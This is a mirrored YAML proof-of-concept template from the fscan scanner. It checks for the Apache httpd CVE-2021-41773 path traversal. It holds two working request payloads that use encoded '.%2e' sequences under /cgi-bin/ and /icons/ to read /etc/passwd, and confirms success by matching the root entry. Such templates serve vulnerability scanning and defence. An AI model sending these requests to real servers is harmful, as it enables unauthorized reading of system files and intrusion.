mirror of https://github.com/qwqdanchun/fscan.git
16 lines
564 B
YAML
16 lines
564 B
YAML
name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
|
|
groups:
|
|
cgibin:
|
|
- method: GET
|
|
path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
|
|
expression: |
|
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
|
icons:
|
|
- method: GET
|
|
path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
|
|
expression: |
|
|
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
|
detail:
|
|
author: JingLing(https://github.com/shmilylty)
|
|
links:
|
|
- https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ |